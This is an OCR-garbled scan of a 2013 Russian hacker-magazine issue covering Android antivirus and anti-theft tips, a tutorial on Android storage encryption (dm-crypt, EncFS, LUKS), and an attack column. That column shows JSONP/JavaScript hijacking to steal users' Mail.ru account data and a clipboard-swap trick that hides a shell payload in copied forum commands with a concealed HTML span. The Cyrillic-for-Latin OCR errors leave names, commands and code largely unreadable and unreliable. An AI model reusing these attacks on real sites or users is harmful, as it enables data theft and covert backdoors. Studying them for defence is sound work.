позволяющая задействовать механизм «сохранения», чтобы 
при обновлении прошивки антивор оставался на месте. Сам 
ярлык антивора после установки в системный раздел будет 
спрятан, а для его запуска нужно будет набрать специальный 
код в номеронабирателе. 
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Включить АпІі-ТНеІІ 

Включение защиты АпІі-ТЬеИ При 
включении программа АпО-ТЬеІІ перейдет в 
режим невидимки, при выключении - в 
режим видимости. Функция защиты от 
удаления аѵазі! Апіі-ТНеІІ работает только в 
том случае, если эта настройка включена. 
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ЖИЗНЬ БЕЗ АНТИ ВИРУСА 

Как бы там ни было, а жизнь без антивируса опре- 
деленно есть. Чтобы не рисковать потерять свои 
данные и деньги, достаточно выполнять всего три 
простых правила: 

1. Всегда устанавливать приложения из Ооодіе 
РІау. Да, здесь тоже то и дело проскакивают 
вирусы, однако масштаб эпидемии на не- 
сколько порядков ниже, чем во всякого рода 
варезниках, которые и являются главным ис- 
точником заразы {это данные исследований). 
Я знаю, как велик соблазн скачать платную со- 
фтину задарма, но в этом случае уж будь добр 
взять всю ответственность на себя — включая 
ярлык вора :). 

2. Всегда читать отзывы пользователей и спи- 
сок привилегий перед установкой. Это очень 
просто и приносит реальный профит. Пользо- 
ватели обычно сообщают о вирусе в коммен- 
тариях, а привилегии на совершение звонков 
или отправку ЗМЗ должны быть обязательно 
указаны. Причем такие виды «опасного» пове- 
дения обязательно подсвечиваются. 

3. Установить на смартфон последнюю доступ- 
ную прошивку, даже если она неофициаль- 
ная. В старых ядрах есть дыры, которые могут 
быть использованы для обхода практически 
всех уровней защиты, так что, если подцепить 
хитро накодированный вирус, можно сильно 
пострадать. Обновление решит эту пробле- 
му, но только в том случае, если вместе с про- 
шивкой устанавливается новое ядро. Обычно 
авторы проши вок это указывают. 

Соблюдая эти простые правила, ты сведешь 
риск заражения практически к нулю. НС 










































































54 



ХАКЕР 06/173/2013 





ШИФРУЕМ ПАМЯТЬ СМАРТФОНА, 
ЗР-КАРТУ И СОДЕРЖИМОЕ РРОРВОХ 



Любой мобильный гаджет может быть потерян, оставлен, забыт и просто похищен. Любую ин- 
формацию, которая хранится на нем в незащищенном виде, можно прочитать и использовать 
против тебя. А самый эффективный способ защиты информации — шифрование. В этой ста- 
тье мы поговорим об особенностях реализации системы шифрования данных в новых версиях 
Апсігоісі, а также обсудим инструменты, позволяющие реализовать выборочное шифрование 
отдельно взятых каталогов. 
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ВВЕДЕНИЕ 

Апсігоісі основан на ядре 1_іпих, которое, в свою очередь, вклю- 
чает в себя целый ряд механизмов, реализующих шифрование 
самых разных сущностей. Для криптозащиты дисков и разде- 
лов предусмотрена система под названием бт-сгурі — свое- 
го рода криптофильтр, через который можно пропустить все 
запросы к диску или разделу и получить шифрование данных 
на лету. 

Программисты Соодіе научили Апсігоісі использовать бт- 
сгурі, начиная с версии 3.0 НопеусотЬ, где появилась опция, 
позволяющая быстро включить шифрование и задать РІІЧ-код 
на доступ к данным. Со стороны пользователя все смотрится 
очень просто и беспроблемно: подключил телефон к заряднику, 
дождался полной зарядки и нажал на заветную кнопку. Система 
начала шифрование уже имеющихся данных. Гораздо интерес- 
нее все это выглядит изнутри. 

ОСОБЫЙ ПОДХОДАМ ОКОЮ 

В любом дистрибутиве І_іпих за управление бт-сгурі отвечает 
утилита сгурІзеШр, создающая зашифрованный по стандарту 
І_ІЖ5 том, к которому можно получ ить доступ и с помощью сто- 
ронних инструментов из ѴѴіпсІоѵѵз или ОЗ X. Обычно сгурізеіир 
запускается на этапе инициализации ОС из загрузочного 
іпіігатіз-образа и подключает бт-сгурі к дисковому накопите- 
лю, который затем монтируется. 

В Апсігоісі все иначе. Из-за требований к лицензированию 
всех компонентов выше ядра с помощью АрасМе-совместимой 
лицензии, сгурізеіир, распространяемая на условиях СР1_2, 
не включена в состав Апсігоісі. Вместо нее используется раз- 
работанный с нуля модуль сгурНз для местного менеджера 
томов ѵоісі (не путать с родными Ыпих- инструментам и: ѵоісі 
и сгурііз, это совсем другие разработки}. 

По умолчанию Апсігоісі использует сгурііз для шифрования 
пользовательских данных, настроек и приложений (каталог 
/баіа). Он должен быть запущен на раннем этапе загрузки 
ОС еще до запуска графической среды и базовых приложений, 
так, чтобы более высокоуровневые компоненты системы смог- 
ли привести систему к нужному состоянию, прочитав настрой- 
ки, и вытащить нужные данные из кеша. 

В автоматическом режиме сделать это невозможно, так 
как система должна запросить у пользователя пароль для рас- 
шифровки, для чего нужен запуск графической среды, а ее, 
в свою очередь, невозможно запустить без подключения ката- 
лога /баіа, который невозможно подключить без пароля. Что- 
бы выйти из этой ситуации, в Апсігоісі применили необычный 
трюк, заставив ОС запускаться «дважды». Первый запуск ми- 
нимальной системы происходит перед запуском сгурйз, чтобы 
запросить пароль для расшифровки с подключением к /сіаіа 
временной файловой системы, после чего система, по сути, 
завершается, подключается зашифрованный раздел /баіа, 
и запускается уже окончательный вариант ОС. 

ВКЛЮЧЕНИЕ ШИФРОВАНИЯ 

Шифрование данных в Апсігоісі включается с помощью меню 
«Настройки — » Безопасность — > Зашифровать данные». 
При этом смартфон должен быть полностью заряжен и подклю- 
чен к заряднику, а в качестве метода разблокировки исполь- 
зоваться РІЫ-код или пароль (Настройки -* Безопасность — > 
Блокировка экрана — > РМ-код), который следует ввести перед 
запуском операции шифрования. Смартфон предупредит 
о том, что операция займет около часа, в течение которого 
устройство будет несколько раз перезагружено. 

Далее произойдет собственно то, что описано в предыду- 
щем разделе. Смартфон загрузит минимальную версию си- 
стемы с подключением временной файловой системы к точке 
/баіа и начнет шифровать данные, выводя прогресс операции 
на экран. Само шифрование происходит следующим образом: 

1. Сначала ѵоІб/сгурИз генерирует 128-битный мастер-ключ 
на основе случайных данных из /сіеѵ/игапсіот и с помощью 
этого ключа отображает раздел, содержащий каталог /баіа, 
в новое виртуальное криптоустройство, запись в которое 
приведет к автоматическому шифрованию данных с помо- 
щью мастер- ключа, а чтение — к расшифровке. 

2. Мастер- ключ шифруется с помощью РІЫ-кода пользователя 
и помещается в конец раздела. Отныне при загрузке систе- 
ма будет спрашивать пользователя РИМ -код, читать из раз- 
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< I - . I Зашифровать данные 

Можно зашифровать данные 
различных типов: аккаунты, 
настройки, загруженные 
приложения и их контент, 
мультимедийные и другие файлы. 
После этого при каждом 
включении устройства 
потребуется вводить РІІЧ-код или 
пароль. Шифрование снимается 
только путем сброса настроек, в 
результате которого удаляются 
все данные. 

Шифрование занимает не менее 
часа. Батарея должна быть 
полностью заряжена, а 
устройство подключено к 
источнику питания, пока 
шифрование не завершится. Если 
прервать его, данные на 
устройстве будут частично или 
полностью потеряны. 

Зашифровать данные 




ШГО 

Подробности реали- 
зации стандартной 
системы шифрования 
Апсігоісі для паранои- 
ков: 128-битный АЕ5 
в режиме СВС и Е83ІѴ: 
ЗНА-256. Мастер- 
ключ шифруется 
другим 128-битным АЕ5- 
ключом, полученным 
из пользовательского 
пароля при помощи 2000 
итераций по стандарту 
РВК0Р2 с 128 битами 
случайной соли. 



Апсігоісі как бы предупреждает 



дела зашифрованный мастер-ключ, 
расшифровывать его с помощью РИМ- 
кода и подключать зашифрованный 
раздел /баіа, 

3. Чтобы зашифровать уже имеющиеся 
на разделе данные, система последо- 
вательно читает блоки данных из раз- 
дела и пишет их в криптоустройство, 
так что, по сути, происходит последо- 
вательная операция «чтение блока — > 
шифрование — ► запись обратно» до тех 
пор, пока не будет зашифрован весь 
раздел, кроме последних 16 Кб, в кото- 
рых хранится мастер-ключ. 

4. В конце операции смартфон переза- 
гружается, и при следующей загрузке 
система спрашивает РИМ-код для рас- 
шифровки данных. 

В случае с 16-гигабайтным накопителем 
Саіаху ЫехііБ все эти операции занимают 
примерно 30 минут, а самое главное — они 
полностью автоматизированы, поэтому 
с шифрованием справится даже ребенок. 

ОДИН ПАРОЛЬ ДЛЯ РАЗБЛОКИРОВ- 
КИ И РАСШИФРОВКИ? 

Чтобы упростить жизнь пользователям, 
в Соодіе решили использовать один и тот 



же пароль для разблокировки и расшиф- 
ровки данных, в результате чего мы полу- 
чаем довольно противоречивую картину. 
С одной стороны, пароль для расшифров- 
ки должен быть длинным и сложным, пото- 
му что злоумышленник может заниматься 
его подбором и вне смартфона, просто 
сняв образ раздела. Пароль на разблоки- 
ровку, с другой стороны, можно оставить 
и очень простым, так как после нескольких 
неудачных попыток Апсігоісі заблокирует 
экран окончательно, заставив ввести па- 
роль СЗоодІе. 

В результате приходится делать выбор 
между удобством разблокировки и безо- 
пасностью зашифрованных данных (фейс- 
контроль в качестве средства защиты 
не рассматриваем). К счастью, в случае 
если телефон рутован, пароль на расшиф- 
ровку можно указать вручную с помощью 
консольного клиента ѵоісі . Сделать это 
можно так: 

$ зи ѵсіс сгур^Гз сИап^ерм 

пэрол ь 

С этого момента пароли на разблокировку 
и расшифровку будут отличаться, но вновь 
станут одинаковыми, если ты сменишь па- 
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Для Сгуріопііе необходимо два каталога: первый — 
для зашифрованных данных, второй — пустой, где 
будет расшифрованное содержимое первого 



роль на разблокировку (РІЫ-код). Чтобы не лазить в консоль, 
можно воспользоваться одним из графических интерфейсов, 
например ЕпсРаззСІіапдег. 

ОТКАТИ СОВМЕСТИМОСТЬ С ПРОШИВКАМИ 

К сожалению, по каким-то причинам АпсІгоісІ не позволяет вы- 
полнять возврат к незашифрованному разделу. Поэтому, если 
уж данные были зашифрованы, они такими и останутся ровно 
до того момента, пока не будет выполнен сброс до заводских 
настроек (полный вайп) — операция, которая переформатиру- 
ет раздел, содержащий каталог /баіа, автоматически превратит 
его в незашифрованный. 

Но здесь может возникнуть вопрос: «А что будет, если я об- 
новлю АпсІгоісІ или установлю кастомную прошивку?» В этом 
случае все зависит от способа установки. В большинстве слу- 
чаев при обновлении прошивки или установке альтернатив- 
ной прошивки примерно той же версии (например, замена 
СуаподепМоб 10.1 на Рагапоіб АпсІгоісІ 3 или МИЛ 5) вайп делать 
не требуется. Это значит, что установленная прошивка при по- 
пытке примонтировать раздел /баіа «сообразит», что имеет 
дело с зашифрованным разделом, запросит у тебя пароль 
и преспокойно расшифрует данные. 

Если же для установки требуется полный вайп, что обычно 
бывает необходимо при переходе на новые версии АпсІгоісІ, 
то здесь ситуация еще проще. Во время вайпа раздел /баіа 
будет переформатирован и автоматически превратится в не- 
зашифрованный. Главное — сделать перед обновлением бэкап 
с помощью Тііапіипл Васкир или СагЬоп. 



80-КАРТА 

Зоодіе уже давно озвучила свою позицию 
по отношению к карте памяти как к свалке 
барахла, на которой конфиденциальных 
данных не может быть по определению, 
а даже если и есть, шифровать их не име- 
ет смысла, так как пользователь может 
решить вставить карту в другой телефон. 
Поэтому стандартных путей зашифровать 
карту памяти в АпсІгоісІ нет, и, чтобы полу- 
чить такую функциональность, придется 
использовать сторонний софт. 

Среди шифрующего стороннего софта 
мы имеем выбор из трех разных классов 
приложений: 

1. Вещь в себе. Приложение, способное 
создавать и открывать криптоконтей- 
неры, но не позволяющее подключать 
их к файловой системе. Своего рода 
файловый менеджер с поддержкой за- 
шифрованных томов. Вещь малополез- 
ная, так как годится только для ведения 
дневника и заметок. 

2. ПсевдоФС. В Ыпих-ядрах многих сто- 
ковых и альтернативных прошивок есть 
поддержка драйвера файловых си- 
стем пространства пользователя РУЗЕ, 
на основе которой в свое время было 



разработано несколько шифрующих 
ФС. Одна из них — ЕпсРЗ. В АпсІгоісІ 
она есть в виде приложения Сгуріопііе, 
Епсбгоіб и других. Такие софтины по- 
зволяют зашифровать любой каталог 
так, чтобы к нему имели доступ абсо- 
лютно все приложения. 

3. Основанные на бт-сгурі. Схожи 
по функциональности и реализа- 
ции с предыдущими, но используют 
для шифрования родной бт-сгурі. 
ШК5 Мападег — лучший представи- 
тель класса таких софтин. Позволяет 
создать на карте памяти файл-образ, 
который в любой момент можно под- 
ключить к любому каталогу для доступа 
к данным. То же самое можно сделать 
из Ыпих с помощью сгурізеіир или 
изѴѴіпбоѵѵз, используя РгееОТРЕ. 

СПУРТОМ ІТЕ 

Сгуріопііе представляет собой обертку 
вокруг шифрующей файловой системы 
ЕпсРЗ и позволяет создавать и просма- 
тривать зашифрованные тома на карте 
памяти и внутри РгорЬох, а также под- 
ключать тома к каталогам карты памяти 
так, чтобы они были видны всем прило- 
жениям. Нас главным образом интере- 
сует последний вариант использования 
как единственный приемлемый для по- 
вседневного применения, но он требует 
прав гооі, а также наличия поддержки 
РІІЗЕ в ядре. 

Использовать Сгуріопііе в этом ка- 
честве довольно просто, однако, чтобы 
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Каквидно, шифрование невозможно Саіаху Иехи5 исІ( 

ОТКЛЮЧИТЬ 



не возникло путаницы, разберемся с принципами его работы. 
В основе приложения лежит хорошо известный линуксоидам 
инструмент под названием ЕпсРЗ. По сути, это утилита, кото- 
рая позволяет отобразить один каталог в другой так, чтобы 
записанное во второй каталог автоматически попадало в пер- 
вый в зашифрованном виде, а при чтении, соответственно, 
расшифровывалось. Пока отображение включено — доступ 
к данным есть, но стоит его отключить, как содержимое вто- 
рого каталога исчезнет и останется только первый, содержи- 
мое которого полностью зашифровано. 

По этой причине для Сгуріопііе необходимо наличие двух 
каталогов: первый — для хранения зашифрованных данных 
и второй — пустой каталог, куда будет отображаться содер- 
жимое первого в расшифрованном виде. Для простоты на- 
зовем их сгурі и сіесгурі. Создаем эти два каталога на карте 
памяти с помощью любого файлового менеджера. Запускаем 
Сгуріопііе, идем в «Настройки — » Моипі роіпі» и выбираем ка- 
талог сіесгурі. Теперь он всегда будет использоваться как точ- 
ка доступа к зашифрованным данным. Возвращаемся обрат- 
но, переходим на вкладку 1_ОСАІ_ и нажимаем кнопку «Сгеаіе 
ІосаІ ѵоіипле», чтобы инициализировать зашифрованный ката- 
лог. Выбираем каталог сгурі и вводим пароль. Теперь осталось 
вернуться на главный экран и нажать кнопку «Моипі ЕпсРЗ» (и 
вновь ввести пароль). С этого момента все, что ты скопиру- 
ешь в каталог сІесгурТ, автоматически попадет в каталог сгурі 
в зашифрованном виде, и после отключения бесгурі никто 
не сможет прочитать его содержимое (можешь проверить, 
скопировав несколько файлов в сіесгурі, а затем просмотрев 
содержимое сгурі:). 

Таким же образом, кстати, можно организовать шифрова- 
ние данных в ОгорЬох. Сгуріопііе позволяет сделать это из ко- 
робки, но в этом случае доступ к данным можно будет получить 
только через само приложение, то есть для любых операций 
над зашифрованными данными придется запускать Сгуріопііе 
и через его встроенный менеджер файлов совершать все дей- 
ствия. Сам ОгорЬох для АпсІгоісІ, конечно, ведет себя так же, 
но у него хотя бы открытый АРІ, который могут использовать 
другие приложения, а здесь только доступ вручную. 

Чтобы обойти эту проблему, можно установить сервис 
Ргорзупс, который висит в фоне и периодически синхронизи- 
рует содержимое выбранных каталогов с ОгорЬох. Достаточно 
настроить его на синхронизацию каталога сгурі (но не сіесгурі), 
и данные в зашифрованном виде будут автоматически попадать 
в ОгорЬох. Чтобы получить доступ к данным с большого брата, 
можно воспользоваться версией ЕпсРЗ для Ыпих или ѴѴІпбоѵѵз. 
О том, как ими пользоваться, не писал только ленивый. 

ІЛЖ8МАЫАСЕК 

Второе приложение из нашего списка — это ШКЗ Мападег, 
по сути аналогичное по функциональности приложение, ис- 
пользующее в своей основе сіт-сгурі вместо ЕпсРЗ и бинарные 



зашифрованные образы вместо каталогов. 
С практической точки зрения этот вариант 
лучше предыдущего тем, что зашифрован- 
ные с его помощью образы можно будет 
просматривать или изменять практиче- 
ски в любой ОС, включая Ыпих, ѴѴіпбоѵѵз 
и ОЗ X. Недостаток же в том, что его не- 
удобно использовать для шифрования 
файлов в ОгорЬох, так как ОгорЬох-клиенту 
придется каждый раз синхронизировать 
целый образ, который может быть очень 
велик, в противовес отдельных файлов, 
как в случае с ЕпсРЗ. 

Для корректной работы ШКЗ Мападег 
необходимо ядро с поддержкой бпл-сгурі 
и ІоорЬаск, но если первое есть даже 
в ядрах АпсІгоісІ 2.3, то второе доступно 
далеко не во всех стоковых ядрах. По- 
этому, скорее всего, понадобится про- 
шивка с альтернативным ядром, такая 
как СуаподепМоб, АОКР или МИЛ. 

В остальном все просто. Интерфейс 
программы состоит всего из шести кно- 
пок: Зіаіиз, Ііптоипі АН, Моипі, Уптоипі, 
Сгеаіе и Ветоѵе. Чтобы создать новый об- 
раз и получить к нему доступ, достаточно 
нажать «Сгеаіе», выбрать каталог для под- 
ключения, размер и указать пароль и фай- 
ловую систему (РАТ32 для совместимости 
с ѴѴіпсІоѵѵз или ехі2 для Ыпих). Одновре- 
менно на карте памяти могут существовать 
и быть подключенными сразу несколько 
образов, которые можно отключать кноп- 
ками «Уптоипі» или удалять с помощью 
«Нетоѵе». 

Ничего сложного в управлении при- 
ложением нет, скажу лишь, что в пакет 
с ШКЗ Мападег входит также собранная 
для АпсІгоісІ версия утилиты сгурізеіир, 
которую можно использовать для ручного 
управления и подключения образов. 

ДРУГОЕ ПРИМЕНЕНИЕ 

Опѵсгурі и сгурИз используются в АпсІгоісІ 
не только для защиты каталога /сіаіа от по- 
сторонних глаз. С их помощью здесь ре- 
ализована, как это ни странно, система 
установки приложений на карту памяти. 
В ее основе лежит идея шифрованных об- 
разов, по одному на каждое установленное 
приложение. Сделано так для защиты кон- 
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ѴѴАКШЫС 

Модуль (іт -сгурі 
не может применять- 
ся для шифрования 
разделов с файловой 
системой ѴАРР8, так 
как последняя исполь- 
зует низкоуровневые 
операции при обраще- 
нии к МАМ Р -памяти. 



фиденциальных данных, возможно храни- 
мых приложением, от других приложений, 
которые в АпсІгоісІ имеют полный доступ 
к 30 -карте на чтение, а также от тех, кто за- 
владеет 30-картой. 

Запустив терминал и выполнив коман- 
ду сіі, ты сам сможешь убедиться, как это 
реализовано. На скриншоте «Саіаху 
Ыехиз и 61» показан вывод этой коман- 
ды на моем смартфоне. Хорошо видно, 
что кроме псевдо криптоустройства /беѵ/ 
Ыоск/бпл-0, которое подключено к катало- 
гу /сіаіа и отвечает за шифрование данных 
на смартфоне, здесь есть еще 15 подобных 
устройств, подключенных к разным катало- 
гам внутри /тпі/азес. Это и есть приложе- 
ния, установленные на карту памяти. Сами 
приложения при этом хранятся в зашиф- 
рованных образах в каталоге .азес на кар- 
те памяти, а ключи шифрования хранятся 
в основной памяти смартфона. 

Ты можешь также заметить, что здесь 
есть и псевдоустройство /беѵ/іизе, под- 
ключенное к /зіогаде/етиіаіеб/іедасу, 
а также некоторым другим каталогам. Это 
не что иное, как «эмулятор» карты памяти, 
реализованный с использованием опи- 
санного ранее драйвера РІІЗЕ (сам Саіаху 
ІЧехиз карты памяти не поддерживает). 
По сути, это простое зеркалирование ка- 
талога /зіогаде/етиіаіеб/іедасу в /сіаіа/ 
тесІіа/0. При этом каталог /збсагб — это 
ссылка на /зіогаде/етиіаіеб/іедасу. Запу- 
стив команду рз, можно заметить, что зер- 
калирование реализуется с помощью 
приложения /зузІет/Ьіп/зсІсагб, исполь- 
зующего РІІЗЕ в качестве базы. По сути, 
это альтернативная реализация знакомой 
всем линуксоидам ипіопіз. 

ВЫВОДЫ 

Как видишь, реализовать качественное 
шифрование данных в АпсІгоісІ очень про- 
сто, и в большинстве случаев для этого 
даже не потребуется устанавливать до- 
полнительный софт. Единственное огра- 
ничение — это необходимость иметь 
смартфон на базе АпсІгоісІ 4.0 и выше, 
но так как все, что было до 4.0, назвать 
ОС довольно трудно, то и проблемы здесь 
особой нет :). ЭС 
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Все описанные програм- 
мы со всей рубрики ищи 
на диске 



СОБРАТЬ ИНФОРМАЦИЮ, ИСПОЛЬЗУЯ Ш5СВІРТ НМАСКШ6 



РЕШЕНИЕ 

Веб-технологии растут и развиваются. Вот и сегодня мы познакомимся еще 
с одной техникой, которая позволит нам «ломать» что-то. Конечно, она боро- 
дата, с длиной бороды лет на пять, но это не мешает нам эксплуатировать ее 
и сейчас, даже против крупных ресурсов. К тому же в ней есть интересней- 
шая техническая специфика. 

Давай вспомним с тобой такую основополагающую вещь в веб- 
безопасности, как Зате Огідіп Роіісу (ЗОР). В очень упрощенном виде: исполь- 
зуя ^ѵаЗсгірІ (и аналогичные технологии}, мы можем взаимодействовать толь- 
ко с сайтом, на котором он загружен, и не можем взаимодействовать с другими 
сайтами. Например, если мы зайдем на ѵѵѵѵѵѵ.ппаіі.ги, 03, загруженный на нем, 
сможет отправлять запросы наѵѵѵѵѵѵ.таіі.ги и получать на них ответы, но не смо- 
жет с ТІІез.таіІ.ги. Под сайтом в данном случае подразумевается связка: схема 
(НИР, НТТРЗ), имя домена (точное совпадение) и порт (см. рис. 1 ). 

Здесь стоит отметить, что это ограничения именно для 03, 
а не для «НТМЮа» (если можно так не очень корректно выразиться). То есть 
ресурсы сайта, как, например, картинки, файлы стилей или те же файлы 
с ОаѵаЗсгірІ/ом, могут быть расположены на других сайтах, и они будут об- 
работаны/отображены браузером вне ЗОР. Типа <ітд згс=”апуІюз1.сот/ххх. 
|рд”> отобразит картинку. 

Вообще, есть различные методы «легального обхода» ЗОР, поскольку круп- 
ные интер нет- порталы из-за него испытывают проблемы. Ведь для ЗОР разде- 
ление идет в основном по имени, и ему по барабану, что множество различных 
доменов и поддоменов одного интернет- портала для последнего являются 
«доверенной средой». Хотя здесь стоит сказать, что с появлением НТМІ_5 и но- 
вых технологий вообще появляется возможность контролировать поведение 
ЗОР с серверной стороны. Например, технология СОВЗ (Сгозз-Огідіп РІезоигсе 
ЗНагіпд). Но раньше приходилось именно придумывать хаки для обхода ЗОР. 

А зачем это вообще нужно? Небольшой пример. У нас есть сайтѵѵѵлл/.таіі. 
ш и есть ТІІез.таіІ.ги, и с обоих мы в 03 хотим знать имя пользователя, что- 



бы персонализировать отображение (ѵѵеЬ 2.0 и все такое). Чтобы не плодить 
одинаковый функционал на различных доменах, одним из решений может 
быть размещение на специальном поддомене (зѵѵа.таіі.ги) скрипта, который 
бы возвращал нам это значение. 

Но, повторюсь, до НТМІ_5 в 03 мы не могли получать данные с дру- 
гих доменов. ХМЬНТТрРедиезТ раньше разрешен был только в рамках ЗОР. 
И как тогда? 

Один из хаков для обхода ЗОР — 05 РипсТіоп СаІІЬаск. Хотя коллбэки 
здесь несколько косвенно завязаны, но все же... Итак, как же действует этот 
способ. 

Все, что требуется для решения описанной задачи с использованием 
коллбэков, — это разместить на зѵѵа.таіі.ги скрипт (изег.рілр), который бы ге- 
нерил ОаѵаЗсгірІ: с необходимыми данными, то есть с именем пользователя. 
Итог работы выглядит примерно так: 

ІізегМатеРипсСВ ( 

[ 

[ 'РІО'. 1 Ѵазѵ а Ѵазіп^, 

[ 1 ІІ5егпате ' , ' ѵазуа@таі1 ._ги ' ], 

-Ш 

Но как это нам поможет? Очень просто. Теперь мы можем кросс-доменно 
подключить этот ОауаЗспрІ в любую страницу на любом другом домене (■МІе. 
плаіі.ш, ѵѵѵѵѵѵ.таіі.ги}: 

<зсгір1:> 

типссіоп ЦзегІМзтеРипсСВГх') { а!ег1:(х) ; } 

</зсгір ѣ> 

кзсгірі: 5РС=“>ѵЫ:р: //зма .таіі. ги/изег.рбр" > 

</зспірф> 




Мйр://ѵѵѵш.ехатрІе.сот/сІіг/раде.ЫтІ Соответствует 
ГіПр ://лллллл/.ехатрІе .сот /сі і г2/оіГіег. Гііті Соответствует 

іійр :/ Дѵтѵ.ехатріе.сот : 81 /СІ і г/оіііег. МтІ Не соответствует 
Ічйрз: //ѵѵѵлѵ.ехат ріе . сот/сЗ іг/оіМег. ІгітІ Не соответствует 
Мйр ://еп . ехагоріе . сот/сііг/оіМег. МітІ Не соответствует 
Ітйр ://ехатрІе. сот/Оіг/оНі ег.Ыті Не соответствует 

Іійр://ѵ2.ѵлто.ехатрІе.сотфі г/оіііег. ІТпіІ Не соответствует 



Тот же протокол и домен 

Тот же протокол и домен 

Тот же протокол и домен, но другой порт 

Отличается протокол 

Отличается домен 

Отличается домен (требуется полное соответствие) 
Отличается домен (требуется полное соответствие) 



Рис. ЗОР. Сопоставление правил для сайта ЬПр://ѵѵѵѵѵѵ.ехаппрІе.сот/сІіг/раде.ІіітІ 



Здесь во второй строке мы объявляем функцию 
изегИатеРипсСВ на своей странице, и она будет ра- 
ботать в рамках нашего домена. Далее, в четвертой 
строке, мы подгружаем ОаѵаЗсгірІ: со стороннего узла. 
Это, считай, НТМІ_, ЗОР нас здесь не ограничивает. Под- 
грузившись, данный скрипт просто вызывает функцию, 
определенную нами. Причем с параметрами, которые 
мы хотели получить, -—имя пользователя и так далее 
(которые появляются здесь динамически). Таким об- 
разом, мы в нашей функции получаем данные с другого 
домена. ЗОР обойден. Надеюсь, идея понятна. 
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Хорошо. Это — махинации, которыми пользуется разработчик. Но, 
я думаю, ты уже понял, что этот же прием можно использовать в хакерских 
целях. Все, что требуется, — это разместить такую страничку с подгрузкой 
из у себя на сайте, а после — заманивать к себе пользователей. Итог — 
ты «знаешь» всех, кто заходил к тебе. Также стоит отметить, что основной 
вектор атаки — это увод инфы пользователя. В самом удачном случае это 
будет что-то конфиденциальное. Или лучше — Апй-СЗВР-токен. И тогда с 
использованием токена станет возможным выполнить какой-нибудь за- 
прос от пользователя. 

Так. Теперь немного о распространенности баги. Несмотря на развитие 
новых технологий, не так давно такие баги были найдены в ряде распростра- 
ненных веб-приложений, а также в порталах Яндекса и на мэйл.ру. В послед- 
них двух можно было как раз получать данные об аккаунте пользователя, за- 
шедшего к нам страницу. Выше я не зря упомянул поддомены таіі.ш. На них 
как раз и используется данный трик. Только возвращаются там кое-какие 
другие данные и вызывать надо другой 1!ПІ_. В общем-то, из рисунка 2 можно 
почерпнуть всю необходимую инфу, если захочешь повторить. 

По поводу мэйл.ру здесь только одна важная заметка. Они пофиксили 
слив инфы через хайджекинг, так как теперь (после исправлений) проверя- 
ют поле Неіепгег НТТР-запроса. Чтобы вернулся иЗ-код, значение в Веі'еггег 
должно быть *.таіІ.ги, *.обпокіаззпікі.ги. А достичь этого, подгружая иЗ- 
скрипт со стороннего домена (еѵіі.сот, например), не получится, так как там 
будет зиять именно еѵіі.сот. 

Фикс, как мне кажется, не самый удачный (надеюсь, что в будем будет 
найдено лучшее решение). Дело в том, что фильтровать по Яеіеггег — это, 
как говорится, ЬасІ ргасіісе. Особенно для столь больших порталов. Ведь 
есть методы для обхода Реіеггег. Но это уже отдельная тема для разговора. 
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НТТР/ 1.1 2 СО ОК 
Зегѵес: пдіпх/ 1 . 2 .Э 

Забе: 2 ип„ 21 Арг 2013 17 : 22:14 СИТ 
Сопхега-Тур-е : арр1ісасіоп/х-заѵаэсЕ ірс; 

Сопбепб-Ьепсгбіі: 232 
Сопп&сбіоп: еіозе 
рзр: ср= гг иоы ста ота. шт цы г шт" 

Х-Гглие-ОрЫопз: 0 ЕНѴ 
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Ехрігез : 5 аб, 21 Арг 2012 17 : 22:14 ОКТ 
Ьазх-Нойіііесі: 5 ип, 21 Арг 26)13 2 1 : 22 : 14 СКТ 

іі(буреоі _РЫ 50 МРСа 11 Ьаск_В 

'Типсбіоп 1 I ( РШЗОЫРСаІІЪаск □ И "збабиз": "гіаба": { "асбіоп": "Іізб 1 , 

таіі спб гг : “ 692 ”, "ту спб” : № 5 М , "даппез епс" : "О", "»ймЬа спб" : "О", "Ііэб" : ["к 



І@піаі1 , ги г \ 
Щпіаіі . ги"] )));!■ 



Рис. 2 Получаем имя мыльникаи количество писем на таіі. г и 



«ПОДМЕНИТЬ» БУФЕР ОБМЕНА 



РЕШЕНИЕ 

Очень забавный трик недавно кто-то мне подкинул. Кому-то — спасибо :}. 

Я думаю, что он и тебе понравится, особенно сама идея. 

Итак, суть. Представь некую страничку на каком-нибудь форуме. Там на- 
писано решение интересующей тебя задачи. И для решения ее тебе надо 
написать ряд команд в консольке. И ты, как любой советский гражданин, 
возьмешь интересующую тебя последовательность команд с форума, ско- 
пируешь (<СігІ + С>) и вставишь (<СМ + Ѵ>) их в консоль (не писать же их 
вручную!). А главное — эти команды выполнятся и даже решат проблему. 
Но, кроме того, втихаря от тебя твоя ОС еще и поднимет бэкдорчик на ка- 
ком-нибудь порту и вообще полезет на хост атакующего из-за Ьаск-соппесі 
шелла. Как это возможно? Все просто. 

То, что мы видим, будто мы копируем, — не то, что фактически копи- 
руется и помещается в буфер. Как так? Никакого хардкора. Используется 
одна из разновидностей III гесігеззіпд’а (обобщенное название для таких 
атак, как сііскіаскіпд). Суть атаки проста. Все, что нужно нам для подготовки 
атаки, — правильная последовательность команд для шелла, которая нам 
что-то дельное даст (например, удаленный шелл), и небольшие махинации 
с НТМ!_ и стилями. Начнем со второго. 

Предположим, мы хотим, чтобы отобразилось «діі сіопе діі://діі.кегпеІ. 
огд/риЬ/зст/ЩіІз/кир/кир.діІ» (см. рис. 1), нос неким скрытым пэйлоадом, 
который также исполнится: 

§іб сіопе^ 



<5рап збу 1 е= " роз і біоп : аЬ5о1ибе;_ 1е5б_: _^100рхх бор: -1ѲѲрх‘'>«^ 
/сіеѵ/пи іі; апѵ рауіоасі : сіеа.гі <Ьг>§іб сіопе </5рап>*^ 



§ібіУ /§іб . кегпеі . ог§/риЬ/5ст/ибіІ5/кир/кир.§іб 

Как видишь, в центре команды мы дополняем последовательность ко- 
мандами и полностью прячем их от глаз зрап’ом. Первый дй сіопе мы от- 
правляем в /беѵ/пиІІ, чтобы он не исполнялся, далее — наш пэйлоад, и по- 
вторная «дй сіопе» с уже не скрытым (за </зрап>) параметром. То есть юзер 
видит только первый «дй сіопе» и окончание «дй://дй.кегпеІ.огд/риЬ/5ст/ 
Щііз/кир/кир.дй». При этом, когда пользователь выделяет и копирует дан- 
ные, в буфер обмена уже попадает все, за исключением элемента зрап, ко- 
торый убирается браузером. 



О С| ^1е:///С:/и$ег5М'Ое5ІЦорДе5Т%20(2).ттІ 

§іі сіопе §іі; §іі.кегае 1 .ог§ риЪ зет ПЙ 5 кир кир.діі 



Риі Мы ВИДИМ 
вполне безопасную 
команду, которую 
и копируем 
